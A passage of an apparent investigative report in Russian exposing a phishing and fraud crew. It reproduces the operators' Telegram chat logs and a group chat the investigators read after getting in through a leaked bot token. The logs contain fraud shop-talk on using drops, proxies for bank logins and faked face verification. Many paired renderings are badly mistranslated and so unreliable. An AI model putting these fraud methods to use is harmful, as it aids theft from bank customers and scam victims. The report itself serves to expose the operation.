100%100%
B
Боня2025-11-24 14:49
Канал Tg будет взломанТг-канал украдут
-- Программа проверки Raven CC (2 сообщения) --
B
Боня2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Боня2025-11-21 21:18
/check/check
-- Чат в браузере Vision (2 сообщения) --
B
Боня2025-11-14 16:47
Спасибо.Спасибо
B
Боня2025-11-14 16:47
Как перевести «vicen werk» на русский?Вижен-ворк в Ру?
-- 💬ONE|Чат (86 сообщений) --
B
Боня2025-03-05 17:06
Ребята, подскажите, где можно купить прокладки.Ребята, подскажите, где можно найти площадки
B
Боня2025-03-05 16:22
просто даже не могу устроить маниакальную вечеринкупросто даже маникюр сделать не может
B
Боня2025-03-05 16:22
то же самоетакже
B
Боня2025-03-05 16:21
Бля, ответь мне, есть ли у наставника чат со студентами или нет.Блин, кто-нибудь ответит, есть ли у наставника чат с учениками или нет?
B
Боня2025-03-05 16:10
и чей это?а кто это?
B
Боня2025-03-05 15:44
Это несложно, но здесь нет полных руководств, только учебные материалы.Там несложно, но полных руководств здесь нет — только у наставников
B
Боня2025-03-05 15:42
В принципе, да, если знаешь, как это сделать.По сути, да, если умеешь
B
Боня2025-03-05 15:42
полдняполдня
B
Боня2025-03-05 15:42
В первом группе 600 человек, он не отвечает.на вопрос о первых 600 человек он не отвечает
B
Боня2025-03-05 15:41
Если у вас есть деньги, купите тот, за который просят 200 долларов.Если у тебя есть деньги, бери ту, которая просит 200 долларов
B
Боня2025-03-05 13:55
Кто отлично преподаёт в студенческом чате?У кого из преподавателей по фантастике есть чат для учеников?
B
Боня2025-03-03 15:10
ЧекиЧеки
B
Боня2025-03-03 15:10
Тот, что пылесоситКоторая пылесосит
B
Боня2025-03-03 15:10
ПонялЕсть
B
Боня2025-03-03 15:10
Наверное, есть и шлюхи, занимающиеся программированием.Ну, тут точно полно хакеров с этим софтом
B
Боня2025-03-03 15:09
Это былоБыло
B
Боня2025-03-03 15:09
О, это хорошо.О, вот это круто!
B
Боня2025-03-03 15:09
Тринуриует руруТринуриует руру
B
Боня2025-03-03 15:09
И их собираютА их собирают
B
Боня2025-03-03 15:09
Тип просто сидит там и возится с оберткамиТип сидит, фантики разбрасывает
B
Боня2025-03-03 15:04
Почему здесь есть украинские номерные знаки?П: а зачем на украинском номера?
B
Боня2025-03-03 15:03
Я сказал: «kc».Я сказал «кц»
B
Боня2025-03-03 15:03
Я понял.Я понял
B
Боня2025-03-03 15:03
Если дело сложное, ты потеряешь свою котелку.Если у тебя тут что-то пойдет не так, то котелок слетит
B
Боня2025-03-03 15:03
Блин, давай посчитаем, сколько раз ты успеешь пробежать по «fb rekul», пока я снимаю ру с огня.Бля, давай, сравним: сколько раз ты запустишь рекап в Фейсбуке, пока я сниму руку
B
Боня2025-03-03 15:02
Для сопровождающейВ эскорт-агентство
B
Боня2025-03-03 15:02
У этих типов такая «чити-чити»-развитость, что они готовы начать с какого-нибудь гребаного онаниста.У этих типов развитие сводится к тому, чтобы завести какую-то херню, чтобы подрочить
B
Боня2025-03-03 15:02
Бля, тут одни только «уокеры».Бля, тут одни воркеры по ру
B
Боня2025-03-03 15:02
Какие столыКакие столы
B
Боня2025-03-03 15:01
Если у тебя красивый голос, 30 будет твоим.30 — твои будут, если голос красивый
B
Боня2025-03-03 15:01
Деньги есть ещёТам больше денег
B
Боня2025-03-03 15:01
Приходите работать в мою компанию.Приходите работать ко мне в культурный центр
B
Боня2025-03-03 15:00
НетНет
B
Боня2025-03-03 14:59
PlategamПлатегам
B
Боня2025-03-03 14:59
+ Я не знаю, как пользоваться функцией просмотра повторов+ я не разбираюсь в повторах
B
Боня2025-03-03 14:59
Хорошие капли найти нелегко.Хорошие дропы найти тоже сложно
B
Боня2025-03-03 14:58
Или же существует версия 1.0?Или версия 1.0 есть
B
Боня2025-03-03 14:58
Здесь всего 2,0 фиша.А вот фиши на ток 2,0
B
Боня2025-03-03 14:58
Или лучше 1.0, чем 2.0.Ну, или лучше 1.0, чем 2.0
B
Боня2025-03-03 14:57
С мамонтамиС мамонтами
B
Боня2025-03-03 14:57
Версия 2.0 не работает, если просто сидеть без дела и возиться с ерундой.2.0 — не стоит сидеть и болтать ерунду
B
Боня2025-03-03 14:57
Я больше специализируюсь на дорожном движении.По трафику я уже не первый
B
Боня2025-03-03 14:57
Вот «X» от РуВот крестики на руке
B
Боня2025-03-03 14:56
Но это не рекламные слоганыНо это не рекламные команды
B
Боня2025-03-03 14:56
Да, бывают. Я знаю одного такого человека.Есть знакомые, которые этим занимаются)
B
Боня2025-03-03 14:56
Но это не проблема, если ты знаешь, как зарабатывать 400–500 в день.Да, это не так уж и сложно — если уметь, то можно зарабатывать по 400–500 в день
B
Боня2025-03-03 14:55
Ну и что в этом такого?)Ну, так что же я тут забыл?)
B
Боня2025-03-03 14:55
Здесь есть ссылка на руководствоТам есть ссылка на руководство
B
Боня2025-03-03 14:54
Вот такие рукиВот такие ру заведут
B
Боня2025-03-03 14:54
Блядь, слюни течет и глазами вышибает, чтобы получить эту гребаную руку.Черт, чтобы завести ру, можно пускать слюни и раскрывать глаза в разные стороны
B
Боня2025-03-03 14:54
Ну, в чём же проблема? Это же та же самая работа.Ну, а в чём тут проблема? Это же тот же самый ворк
B
Боня2025-03-03 14:53
Чтобы добраться до этой зоны, понадобится месяцДо зоны доставят через месяц
B
Боня2025-03-03 14:53
И уйти некуда. Если у тебя есть мозги, ты сам догадаешься. Если нет — убирайся отсюда.Да и размышлять тут не о чем — если есть мозги, то разберешься, а если нет, то что тут делать?
B
Боня2025-03-03 14:53
Чего ты хочешь?А что ты хотел?
B
Боня2025-03-03 14:53
РекламаРеклама
B
Боня2025-03-03 14:52
Я здесь уже 2 дня, и версия 2.0 меня не интересует. А я-то думал, что она классная.Я здесь уже второй день, а версия 2.0 меня не интересует — я думал, что это будет что-то классное
B
Боня2025-03-03 14:52
И съешьте мамонтаИ завести мамонта
B
Боня2025-03-03 14:52
Подумай головой, что сказать.Надо хорошенько подумать, что ответить
B
Боня2025-03-03 14:52
Здесь нет никаких секретовЗдесь нет никаких секретов
B
Боня2025-03-03 14:52
Что он тебе подарит?Что он вам даст
B
Боня2025-03-03 14:52
Ну, какой в этом смысл, если в руководстве есть вся та же информация?А в чём смысл, если в руководстве есть вся эта информация?
B
Боня2025-03-03 14:51
У него будет время ответить на все ваши присылкиХрен вам, как мы успеем всем отвечать
B
Боня2025-03-03 14:51
Вот это тренировка!Какая практика
B
Боня2025-03-03 14:51
У него там 100 человек.Черт, у него там по 100 человек
B
Боня2025-03-03 14:51
Почему бы тебе не дать мне немного денег, а я в обмен отдам тебе инструкцию к зажиму?Может, вы мне бабки скинете, я вам дам инструкцию из закрепа
B
Боня2025-03-03 14:50
При фиксацииВ закрепке
B
Боня2025-03-03 14:50
Тебе не нужна инструкция, чтобы научиться всему.А к черту вам обучение — у всех же есть инструкция
B
Боня2025-03-03 14:50
Версия 2.0 — это то, что есть.2.0 Каким был, таким и остался
B
Боня2025-03-03 14:50
В чём, блядь, проблема?Ну и какая тут, блин, задача
B
Боня2025-03-03 14:48
Это ты сам начал?Ты уже сам заводил?
B
Боня2025-03-03 14:48
Не сумасшедшийНи в коем случае не ворк
B
Боня2025-03-03 14:48
На lk есть запросВ ЛК есть вбив
B
Боня2025-03-03 14:48
Что там за дела?Какие задания по ЛК
B
Боня2025-03-03 14:48
Кем из них вы, придурки, являетесь, как вы сами выразились?Кто эти, блядь, такие, как ты сам выразился?
B
Боня2025-03-03 14:47
Я не понимаю, о чём вы здесь говорите.Вот здесь я не понял, что ты сказал
B
Боня2025-03-03 14:46
Если они вошли в систему, то отлично.Если заходят в личный кабинет, то ЗБС
B
Боня2025-03-03 14:46
Ну, а они входят в систему?Ну, заходят в личные сообщения?
B
Боня2025-03-03 14:45
Я не знаю, как они их снимают.Не знаю, я не понимаю, как их снимают
B
Боня2025-03-03 14:45
Собак, которых стоит списать со счетов?Пуши на списание?
B
Боня2025-03-03 14:45
Бля, тут же, блядь, кнопкаХер там, да ещё и пуши тапать
B
Боня2025-03-03 14:42
Я наливаю это самЯ сам лью
B
Боня2025-03-03 14:42
Я, блядь, понял, что это не для придурков.Я, блядь, понял, что это не на хуй
B
Боня2025-03-03 14:41
Брат, здесь на жетоны ничего не продают, это жетон на зарплату.Брат, тут ничего не продают за фишки — фишки нужны только для оплаты
B
Боня2025-03-03 14:41
Понятно, некуда это вылитьЯ понял, что его некуда выливать
B
Боня2025-03-03 14:40
По-моему, Regular 2.0.Обычные 2.0, вроде как
B
Боня2025-03-03 14:40
Это не то, чтобы они перегружали трафикТак что трафик тут сразу не поступает
-- Фбстор — чат успешных веб-мастеров! (23 сообщения) --
B
Боня2025-02-26 07:51
Ну, делай, что тебе, блядь, вздумается.Ну вот, делайте там, какая разница, чье лицо
B
Боня2025-02-26 07:50
Школьник — 200₽.Ну, школьнице 200₽ даю
B
Боня2025-02-26 07:50
Это сработаетПойдет
B
Боня2025-02-26 07:50
На улице вы увидите бездомного.На улице поймали бомжа — пропусти его
B
Боня2025-02-26 07:50
Так что каждый верит в своё собственное лицо, чьим бы оно ни было.Так все же верифицируются на свое лицо, там пох чье
B
Боня2025-02-26 07:50
На лицо.На себя
B
Боня2025-02-26 07:49
Но дело в том, что, как бы там ни было, я уже делал это 10 раз.Но на самом деле, какая разница, у меня так 10 аккаунтов с верификацией
B
Боня2025-02-26 07:49
Так скажи мне, ты просто несешь чушь.Так скажи, черню леешь?
B
Боня2025-02-26 07:49
Вы можетеМожно
B
Боня2025-02-26 07:49
На лицо.На себя
B
Боня2025-02-16 20:26
вместо того, чтобы замучить их какими-то тренировками и заставлять их работать в условиях интенсивного движения.а не, типа, обманывать их каким-то обучением и накручивать на них трафик
B
Боня2025-02-16 20:25
обычные сайты типа YouTube и т. д.леи, обычные УБТ, ТТ, YouTube и т. д.
B
Боня2025-02-15 17:31
XzНе знаю
B
Боня2025-02-15 17:31
Под предлогом обученияПод предлогом обучения
B
Боня2025-02-15 17:31
К каналамНа каналы
B
Боня2025-02-15 17:31
Это просто толпа людей.Просто трафик от людей набирает обороты
B
Боня2025-02-15 17:31
Так вот, этот парень предлагает подписаться на все его каналыИ вот этот парень говорит, чтобы подписаться на все его каналы
B
Боня2025-02-15 16:36
Вам не нужно писатьХуиню предлагает — можете не писать
B
Боня2025-02-06 15:11
Если вы не знаете основ правильного налива, то вам придетсяЕсли ты не знаешь таких азов, как, например, как лить, то что же ты будешь делать?
B
Боня2025-02-06 15:11
Там есть кнопка для смены aipi, вам стоит хотя бы поискать это в Google.Нажав на эту кнопку, можно изменить IP-адрес — попробуй поискать в Google
B
Боня2025-02-06 15:10
🤨🤨
B
Боня2025-02-06 15:09
Вы можете изменить положение аипи, повернув его.Там можно изменить порядок отображения
B
Боня2025-02-06 15:09
Почему 1? Это же тот же самый мобильный телефонПочему 1? Ведь это же мобильные устройства
-- CryptoGrab — ЧАТ взаимопомощи (10 сообщений) --
B
Боня2025-02-06 15:31
Все не так простоВсе не так просто
B
Боня2025-02-06 15:31
Просто.Изи
B
Боня2025-01-23 20:30
Ни одного примераНе один пример
B
Боня2025-01-23 20:30
Мне не кажется забавным, что я не смог найти в Интернете ни одной рекламы тестов на AML.А вот что забавно — я вообще не нашел в интернете рекламу тестов AML
B
Боня2025-01-23 17:20
На AML вообще ничего нет.На AML вообще ничего нет
B
Боня2025-01-23 17:20
Я попробовал aml на Facebook, чтобы найти в Америке также полезные, даже старые наборы, которых нет в интернетеЯ пытался найти информацию об АМЛ в Фейсбуке, но так и не нашёл в интернете ни одной стоящей ссылки, даже старых.
B
Боня2025-01-23 17:19
Ну, а какое именно предложение вы планируете сделать?Ну, а вообще, какую оферту ты планируешь?
B
Боня2025-01-23 17:16
Вы пользуетесь aml?А ты амл пьешь?
B
Боня2025-01-21 20:38
Тем, кто занимается фб, хотелось бы прояснить пару вопросовЕсть ли кто-нибудь, кто ведет страницу в Фейсбуке? Хотел бы уточнить пару вопросов
B
Боня2025-01-20 11:08
У кого-нибудь есть примеры кодов Creos для AML?У кого-нибудь есть примеры крео для AML?
-- Rolex | общий чат (28 сообщений) --
B
Боня2024-09-11 15:29
Что делают литовцы на какой площадке?А Литву на какой площадке избивают?
B
Боня2024-09-11 15:21
Ты что, с винтом возишься?Ты что, с ума сошёл?
B
Боня2024-09-11 15:20
Просто эти сайты очень ограничивающие, и с ними приходится столько возиться, блядьПросто эти площадки сильно ограничивают работу, и с ними столько херни
B
Боня2024-09-11 15:19
У меня уже есть идея. Если они это реализуют, получится чертовски круто.Я там одну тему придумал и написал: если её реализуют, будет просто заоблачно
B
Боня2024-09-11 15:19
На этой усадьбе я не вижу особо много бревен.Логотипов на «Финке» я, честно говоря, особо не вижу
B
Боня2024-09-11 15:19
У них там какая-то полная херня творится со всеми концертными площадками.Да ладно, у них там какие-то придурки устраивают какую-то херню со всеми площадками
B
Боня2024-09-11 15:16
Вот о чём я и говорю — это как «Форд» на «Форде».Ну я и говорю, что это фрод на фроде
B
Боня2024-09-11 15:15
Я не могу понять, что сейчас стало лучше — я вижу, что в Финляндии никто не работает.Че сейчас лучше работает — я вообще понять не могу, вижу, что у всех с «Финкой» что-то не работает
B
Боня2024-09-11 15:08
Ну, шансы 50 на 50, что вам повезет с прокси.Ну, 50 на 50, если повезет с прокси
B
Боня2024-09-11 15:07
Но чтобы вы понимали: в наши дни, когда используются «люкс-прокси», даже в Viber при входе в систему система сходит с ума.Но чтобы было понятно: сейчас с прокси-серверами даже в «Вайбере», когда заходишь, происходит фрод
B
Боня2024-09-11 15:07
Ну, насчет банок из ЕС я не знаю.Ну, я в европейских банках не разбираюсь
B
Боня2024-09-11 15:07
В lkВ личный кабинет
B
Боня2024-09-11 15:06
Раньше в гастрономах было по 10 холодильных камерРаньше лакшери по 10 заходов держали
B
Боня2024-09-11 15:06
Что ж, 922 тоже на первом месте и удерживает позицию.Ну, 922 тоже — один заходит, держат
B
Боня2024-09-11 15:05
Даже «Приват» после трёх посещений их пугает.Даже в приватном чате после трёх попыток их зафридить
B
Боня2024-09-11 15:05
Если 1 прокси — 1–2 банкаЕсли 1 прокси — 1–2 банка тока
B
Боня2024-09-11 15:05
Ну, это зависит от того, какой банкНу, это зависит от того, какой банк
B
Боня2024-09-11 15:04
В этой лакшери-чепухе прокси часто бывают грязнымиВ лакшери хуиня прокси часто бывают грязными
B
Боня2024-09-11 08:44
Оно спит?А он спит?
B
Боня2024-09-11 08:40
О, это отличная идея.Это придумал ЗБС
B
Боня2024-09-11 08:40
А у них разве нет чего-то вроде блошиного рынка или чего-то подобного?А почему у них нет, типа, барахолок то тут, то там?
B
Боня2024-09-11 08:40
Полный бардакХуэво
B
Боня2024-09-11 08:39
БиляБиля
B
Боня2024-09-11 08:39
Есть ли чаты?А там есть чаты?
B
Боня2024-09-11 08:38
Кто-нибудь знает?Кто-нибудь знает?
B
Боня2024-09-11 08:38
Люди на «финке» пользуются TG?В Финке люди пользуются TG?
B
Боня2024-09-10 12:14
Спасибо.Спасибо
B
Боня2024-09-10 12:13
Который час в Финляндии?Сколько сейчас времени в Финке?
-- Актуальное/верификации/заработки💃🛍 (37 сообщений) --
B
Боня2024-06-16 17:17
Я не вижу среди них ярых защитниковЯ не вижу здесь ярых защитников этой
B
Боня2024-06-16 17:17
В общем, ситуация изложена, и теперь каждый сам принимает решение, а тот факт, что её защищает только админ Паша, о многом говорит.Ну, я рассказал, в чем дело, а дальше каждый сам принимает решение; а то, что её защищает только админ Паша, о многом говорит
B
Боня2024-06-16 17:15
И она снова не выплатила деньгиИ она снова не заплатила
B
Боня2024-06-16 17:15
Нет, она перевела деньги нам, а у нас не было основного счета для перевода, поэтому в крайнем случае мы написали Вике.Нет, она перевела её на нас, а у нас не было основного способа перевода денег, и мы написали в Википедию в качестве крайней меры
B
Боня2024-06-16 17:14
Сначала у нас тоже всё было в порядке, но в последнее время твои деньги то и дело пропадают.Сначала у нас тоже всё было нормально, а в последнее время у вас деньги постоянно пропадают
B
Боня2024-06-16 17:14
Я что, спамлю? Я просто сижу здесь и говорю людям правду. Можете это удалить. Пусть люди знают, как вы работаете.А у меня что, спам? Я просто рассказываю людям правду — можешь удалить, что изменится? Пусть люди знают, как вы работаете
B
Боня2024-06-16 17:13
Если у вас есть один из нихЕсли у вас произойдет нечто подобное
B
Боня2024-06-16 17:13
Пора вам задуматьсяТак что вам пора задуматься
B
Боня2024-06-16 17:13
Мы тоже уже давно сотрудничаем с nei, и это уже второй подобный случайМы с ней тоже давно работаем, и это уже второй случай
B
Боня2024-06-16 17:13
И она записала эти «гс» и сказала: «Ты же знаешь, как это работает».А она записала ГС и сказала, что вы знаете, как она работает
B
Боня2024-06-16 17:13
Вот в чём дело: давайте начнём с самого начала. Мы взяли её карту, чтобы положить на неё деньги, положили 60 тысяч, она пошла снимать их, а тут оказывается, что денег там не будет, потому что банкомат заглотил карту — и всё, мы просто выбросили 60 тысяч.Вот именно, дело было так: давайте начнем с самого начала. Мы взяли у неё банковскую карту, положили на неё 60 тысяч, она пошла снимать деньги и пишет, что денег не будет — якобы банкомат заглотил карту, и всё — мы просто выбросили 60 тысяч.
B
Боня2024-06-16 17:11
Это не она нас держитА не мы у неё
B
Боня2024-06-16 17:11
Хотя у нас действительно украли 60 тысячХотя у нас украли 60 тысяч
B
Боня2024-06-16 17:11
«Нормально»? Мы здесь всё объяснили. Ты же нас называешь идиотами.Нормальные? Мы тут всё объяснили, а вы говорите, что мы идиоты
B
Боня2024-06-16 17:10
Ты её защищаешьВы её защищаете
B
Боня2024-06-16 17:10
Она до сих пор держит наши деньгиНаши деньги остались у неё
B
Боня2024-06-16 17:10
Все ониВсе
B
Боня2024-06-16 17:10
Когда мужчине дали 60 тысяч, она ответила, что у неё нет денег.Когда человеку перечислили 60 тысяч, он сказал, что денег не будет
B
Боня2024-06-16 17:10
Описано*Описали*
B
Боня2024-06-16 17:10
Вам уже рассказали обо всей ситуацииТебе описали всю ситуацию
B
Боня2024-06-16 17:09
Кто сдался? Она или мы?Кто тут виноват — она или мы?
B
Боня2024-06-16 17:09
У нас в банке лежит 60 тысяч. Где эти деньги?Залили 60 тысяч — куда делись деньги?
B
Боня2024-06-16 17:09
Тебе всё подробно объяснили, и неважно, какого ты пола.Какие бы женщины тебе ни объяснили всю ситуацию, пол не имеет никакого значения
B
Боня2024-06-16 17:08
Сними 60 тысяч и завязывай на сегодня.Набрать 60 тысяч и забить
B
Боня2024-06-16 17:08
Или пойди на хрен — в разумных пределах.Или, черт возьми, у вас в пределах разумного
B
Боня2024-06-16 17:08
У людей нет средств, чтобы за что-либо заплатитьС чего людям платить
B
Боня2024-06-16 17:08
И он говорит, что карта застряла в терминале, и у него больше нет денег.И говорит, что карта застряла, денег нет
B
Боня2024-06-16 17:08
Мужчине дали 60 тысяч, а она пошла снимать.Человеку перевели 60 тысяч, и она пошла снимать
B
Боня2024-06-16 17:07
Значит, ты мне расскажешь, как обстоят дела.Так вот, обоснуй это по фактам
B
Боня2024-06-16 17:07
Так кто же, блядь, виноват, кто же этот «дроппер», которым я являюсь?Так кто, блядь, виноват, кто тут придурок — я?
B
Боня2024-06-16 17:07
Нечего сказать?Нечего сказать?
B
Боня2024-06-16 17:07
Или я не смог ввести этот чертов ПИН-код.Или что, блядь, руки кривые — даже пин не смогла набрать
B
Боня2024-06-16 17:06
Как, блядь, банкомат мог застрять с картой?Как, блядь, банкомат мог заглотить карту?
B
Боня2024-06-16 17:06
ПрисоскиПодсосы
B
Боня2024-06-16 17:06
А ты, блядь, за неё болеешь.А вы, блядь, зачем тут за неё скачиваете?
B
Боня2024-06-16 17:06
Вы, блядь, «прирожденные», — чертовы идиоты. У вас тут сидит блядь женщина, которая возится со своими деньгами, а её карту заглотил банкомат.Бля, вы, блядь, идиоты, у вас такая херня на бабушке, что банкомат заклинило, когда она вставила карту
B
Боня2024-06-16 16:40
@kysia1987 — это мошенники, не работают, дали «дропкик» и слились с 60 тыс.@kysia1987 — это не работает, это скам, дала небольшую сумму и сбежала с 60 тыс.

МОНЕТТИ ЭСКОБАР: «Безмолвный босс»

В отличие от 261 сообщения Бони, у MONETTI всего лишь 10 публичных сообщений — всё в одном потоке на Чат TraFFeeQ (Арбитраж трафика с использованием черных методов ADS/SEO), в защиту коллеги:

Чат TraFFeeQДекабрь 2025 года
«Человек выполняет свою работу, ему за это платят — есть вопросы?»
Человек выполняет свою работу, ему за это платят — что тут обсуждать?)
Нормализация преступной деятельности как «просто работы»
Чат TraFFeeQДекабрь 2025 года
«С тобой не о чем говорить»
С тобой не о чем говорить
Пренебрежительная власть — менталитет начальника, не допускающий дискуссий
Чат TraFFeeQДекабрь 2025 года
«Кроме тебя здесь есть чем заняться!»
Без тебя есть чем заняться)
Это подразумевает выполнение нескольких операций одновременно, требующих его внимания

Остальное можно узнать в [REDACTED]-группах MONETTI: Medusa Google Ads (мошенничество в сфере PPC с использованием методов «черной шляпы»), а Канал «Deepfakes» (синтетические средства для совершения мошенничества), и ЧАТ «MARLBORO» (закрытый, неизвестен). Подписка на [REDACTED] Premium, круглосуточная работа и «Есть предложение» («У меня есть предложение») Биографии предпринимателей рисуют образ человека, который рассматривает киберпреступность как полноценный бизнес.

МОНЕТТИ ЭСКОБАР: Полный журнал сообщений (10 сообщений)
MONETTI ESCOBAR (@monettiescobar) — Полная история сообщений с переводом
-- TraFFeeQ Chat | Трафиковый арбитраж | Черный SEO/реклама | (9 сообщений) --
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Оставь это!Оставь это!
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Мужчина выполняет свою работуЧеловек занимается своей работой
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:42
Без агрессииНикакой агрессии
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:40
Об этом тоже не беспокойтесьНе переживай и об этом
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
Поговори с ним, брат. Ему это не запрещено.Поговори с ним, брат, ему ведь не запрещали это делать
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
Кроме тебя, здесь есть чем заняться!)Есть чем заняться, кроме тебя!)
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:39
С тобой не о чем говоритьС тобой не о чем говорить
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:38
Это написано рядом с его прозвищем. Не нужно нажимать — ты сам это увидишь.У него рядом с ником написано: «Не надо тыкать», — прочитай
МЕ
МОНЕТТИ ЭСКОБАР2025-12-06 20:38
Человек выполняет свою работу, ему за это платят (если хотите, можем обсудить)Человек выполняет свою работу, за это ему платят, нравится — обсуждайте)
-- Медуза | Google Ads | Чат (1 сообщение) --
МЕ
МОНЕТТИ ЭСКОБАР2025-09-23 18:07
😍😍
Профиль MONETTI ESCOBAR в [REDACTED]
Скриншот 2 — Профиль MONETTI в [REDACTED].
Профиль Боньи в [REDACTED]
Скриншот 3 — Профиль Бони. Обратите внимание на DC2 (Амстердам).

Раздел 7: «Комната паники»

После того как THE ENABLERS REGISTRY получил доступ к группе операторов через уязвимый бот в [REDACTED], произошел следующий обмен сообщениями. Приведенная ниже переписка переведена на английский язык, при этом исходный русский текст сохранен курсивом. Идентификационные данные, использованные для доступа, были замазаны.

Группа операторов — «Idr card» — Полная история чата (61 сообщение)
— REDACTED подключился с помощью утечённого токена бота —
R
УДАЛЕНО25-03-2026 13:03:43
/start
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:06:53
?
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:03
КтоКто
B
Боня25-03-2026 13:07:14
XzНе знаю
R
УДАЛЕНО25-03-2026 13:07:14
Привет, просто нажмите «Сохранить», подождите минуту
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:24
Что за херняЧто, блядь
B
Боня25-03-2026 13:07:27
БлядьБлядь
B
Боня25-03-2026 13:07:28
Вот ктоНу кто же
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:42
Ага.Ахаха
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:07:44
Что за херня?Что за хрень
B
Боня25-03-2026 13:07:53
Бот был взломанБота взломали
B
Боня25-03-2026 13:08:16
Мне сказали, что у нас с обороной полный бардак.Кстати, мне говорили, что у нас защита просто заоблачная
B
Боня25-03-2026 13:08:22
Ну, есть такой типНу, там какой-то парень
B
Боня25-03-2026 13:08:43
Это как взломать бота с помощью фишинга.У нас бота через фиш сломать — это как пальцем о палец ударить
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:09
@devosus
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:21
[УДАЛЕНО].[УДАЛЕНО]
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:09:24
Кто это?Это кто?
B
Боня25-03-2026 13:10:29
Проверьте свой профиль.Загляни в свой профиль
B
Боня25-03-2026 13:10:32
Это хакерЭто хакер
B
Боня25-03-2026 13:10:35
В буквальном смысле.В прямом смысле
B
Боня25-03-2026 13:10:41
Перевел то, что он передаетПеревели то, что он пишет в канале
B
Боня25-03-2026 13:10:55
[УДАЛЕНО — Боня копирует и вставляет сообщение из канала, в котором сообщили об их домене, пытаясь выяснить, кто их заблокировал]
B
Боня25-03-2026 13:12:19
Ну, э-э...Ну, ладно
B
Боня25-03-2026 13:12:23
Я, блядь, не знаю, кто это.Хрен его знает, кто это
B
Боня25-03-2026 13:12:25
Но не навсегдаНо не к добру
B
Боня25-03-2026 13:12:47
@devosus, давай подумаем о защите, пока нас не разгромили.@devosus, подумай о защите, пока нам задницу не разорвали
Примечание редактора: Боня чувствует, что это приближается. Допустим, он россиянин и считает мошенничество в отношении Украины «патриотическим». А как же тогда быть с Индонезией — Партнер БРИКС с октября 2024 года (Казанский саммит)? Разве красть у граждан своих союзников — это тоже патриотизм? Мошенники из СНГ — это воры, не делающие различий между людьми, лишенные как ума, так и лояльности. Ознакомьтесь с нашими другими расследованиями, в которых мы зафиксировали случаи судебного преследования для подобных операторов — исход всегда один и тот же.
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:12:49
Да, я понимаю.Да, я вижу
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:12:55
Иди на хрен.Да ты что, бля, несешь?
B
Боня25-03-2026 13:13:09
Ну, и быть обессиленным тоже не доставляет особого удовольствия.Ну, быть слитыми тоже не особо круто
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:13
Он ничего не сделаетОн ничего не сделает
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:18
Что он собирается делать?Что он выпьет?
D
Девойс25-03-2026 13:13:26
что это такоечто это
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:34
Да, один парень присоединилсяДа, человек присоединился
D
Девойс25-03-2026 13:13:34
откудаоткуда
B
Боня25-03-2026 13:13:35
Даже если вы пару раз заходили на фишинговый сайт со своего IP-адреса, это уже не круто.Даже если с этого IP-адреса уже пару раз заходил на фиш, это уже не так интересно
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:37
ГруппеВ группу
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:38
XzНе знаю
D
Девойс25-03-2026 13:13:39
при интерполяциикогда в Интерпол
D
Девойс25-03-2026 13:13:41
на которыйк какой
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:44
Вот этотЭтой
B
Боня25-03-2026 13:13:46
Я просто зашел сюда, чтобы поболтатьСюда, в чат, заскочил
B
Боня25-03-2026 13:13:49
Он написал, чтоНаписал, что
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:13:56
.
B
Боня25-03-2026 13:13:57
Привет, просто нажмите «Сохранить», подождите минуту
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:14:11
[Фотография опубликована]
D
Девойс25-03-2026 13:14:31
Я их уже видел раньше.Я таких уже видел
B
Боня25-03-2026 13:14:44
Ну, нас тоже поймали на использовании бота «ukr».Ну, нас и по украинскому боту разгромили
B
Боня25-03-2026 13:14:55
Ты не писал сообщений в чате.Пока что в чате ничего не писали
B
Боня25-03-2026 13:14:57
Разве ты не написалА нет, писали
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:15:04
Мне плевать.Да и хрен с ним
B
Боня25-03-2026 13:15:06
От имени каналаОт имени канала
D
Девойс25-03-2026 13:15:23
Забудь об этом, блядь.да похуй
МЕ
МОНЕТТИ ЭСКОБАР25-03-2026 13:15:31
Я развалю эту группуЯ удаляю эту группу
B
Боня25-03-2026 13:15:35
+
D
Девойс25-03-2026 13:15:35
дада
— Группа удалена владельцем —

Группа была удалена в течение нескольких минут. Прощальное подтверждение Бони — «+» — и ответ Девойса «да» говорят сами за себя: они понимали, что их раскрыли, и единственным выходом для них было уничтожить улики. Но к тому моменту данные уже были собраны.

Обратите внимание на показательный комментарий Бони: «Нас также атаковали через украинский бот» — что подтверждает: оба проекта (украинский и индонезийский) обслуживаются одной и той же командой операторов, и это не первый случай, когда их инфраструктура подвергалась взлому.

Раздел 8: Что это показывает

Как работает THE ENABLERS REGISTRY

Каждый домен, который отображается на enablers.report проходит через этот автоматизированный конвейер. Сайт [REDACTED][.]sbs не стал исключением.

Обнаружение
Статический анализ
Картирование инфраструктуры
Открытие происхождения
OSINT
Формирование отчетов

Хронология расследования

20 марта 2026 года
Домен [REDACTED][.]sbs зарегистрировано через компанию IANA #3858
21 марта 2026 года
Обнаружено системой автоматического мониторинга THE ENABLERS REGISTRY
21 марта 2026 года
Полностью автоматизированный анализ завершен: инфраструктура отображена, JS-пакет деобфускирован, протокол WebSocket задокументирован
22 марта 2026 года
